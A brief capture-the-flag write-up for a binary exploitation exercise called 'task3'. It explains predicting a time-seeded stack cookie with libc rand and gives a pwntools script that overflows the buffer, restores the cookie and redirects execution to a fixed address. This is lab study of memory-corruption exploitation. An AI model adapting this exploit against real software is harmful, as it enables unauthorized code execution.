task 2 revamped to include a stack cookie

Watching the main function, there is no way we can bypass that stack cookie soo we have to see how it is generated.

We can also do that random also we are given the libc version so this is the way. Other than that it’s business as usual ( done exactly like the second task).

from pwn import *

from ctypes import *
libc = CDLL("libc.so.6")
libc.srand(libc.time(0))
io = process("./task3")
rnd = libc.rand()
io.sendline("a"*8+'\0' +35*'a'+p32(rnd)+8*'a'+'\xf6\x11\x40\x00\x00\x00\x00')
io.interactive()